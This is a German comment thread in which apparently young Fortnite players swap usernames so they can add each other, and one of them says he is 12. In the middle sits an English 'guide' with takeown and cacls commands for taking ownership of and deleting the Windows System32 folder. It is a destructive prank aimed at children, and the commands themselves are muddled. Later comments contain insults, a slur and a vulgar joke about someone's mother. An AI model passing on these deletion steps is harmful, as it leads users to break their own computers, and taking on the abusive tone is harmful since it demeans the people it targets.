An alle Leute die Fn zocken.... Ich hab kein bock immer alleine zu zocken also auf ehre addet mich oder ich adde euch wenn ihr euren name in die Kommentare schreibt. Ich heiße Swityツ. Dann können wir mal ein 1vs1 machen oder zusammen zocken

Kommentare (13)

Ok col ich binn Brow-12 in fortnite kannst mich adden ab welcher season spielst du ich seit season 1 chapter 1 hab aberr erst ab season 5 chapter 2 angefangen gelt für fortnite auszugeben

Ich meine season 4 chapter 2

Ok bro ich adde dich. Ääähm ich spiele seit chapter 2 bin aber relativ gut und habe chapte2 saison 2 angefangen geld auszugeben

Ich kann dich aber erst spätet adden und bist du erwachsen oder noch teenager oder was ich bin 12 jahre alt

Step 1. Click Start, search cmd, and open Command Prompt.

Step 2. To take ownership of the System32 folder type takeown /f C:\Windows\System32 (or for that instance, you should type the path defined on your computer after C:\) in the command prompt and hit Enter.

Step 3. To delete the System32 folder type cacls C:\Windows\System32 and press Enter.

Step 4. Close the Command Prompt. Also, close any other running application.

Step 5. Now Open the C:\ drive under the Computer option.

Keine Ahnung was "fortnite ist schwul" meint aber ok ich adde dich später Lightpompano689

was is mit dir du huhrensohn spinnst du. Alleine das du noch fn spielst bist du eine behinderung und platzverschwendung für die Erde

digga fortnite ist voll scheiße

Leon ich feier das game auch nicht aber man sollte niemand nur wegen einem game haten wtf

Was ist fett schwarz und es passen 5 bauerbeiter rein deine mutter und ein lkw